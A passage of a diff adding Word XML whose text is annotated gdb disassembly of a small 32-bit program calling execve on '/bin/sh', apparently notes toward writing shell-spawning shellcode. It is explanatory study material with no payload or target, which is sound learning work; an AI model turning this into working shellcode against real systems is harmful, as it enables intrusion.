+        <w:t>Cpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ‘bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048e95 &lt;+17&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   $0x0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">             </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>0x1c</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Cpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ‘null’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048e9d &lt;+25&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    0x18(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>),</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Load ‘bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048ea1 &lt;+29&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   $0x0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">             </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>0x8</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>– Push Null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048ea9 &lt;+37&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>lea    0x18(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>),</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>edx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Load address of ‘name’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048ead &lt;+41&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>edx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">           </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>0x4</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Push </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">address </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>‘name’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048eb1 &lt;+45&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">           </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Push ‘bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048eb4 &lt;+48&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>call   0x8053880 &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>execve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048eb9 &lt;+53&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">leave  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048eba &lt;+54&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">ret    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Execve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Definition:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dump of assembler code for function </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>execve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08053880 &lt;+0&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>push   %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08053881 &lt;+1&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    0x10(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>edx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Cpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> address of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08053885 &lt;+5&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    0xc(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ecx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Cpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> address of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08053889 &lt;+9&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    0x8(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Cpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> address of ‘bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
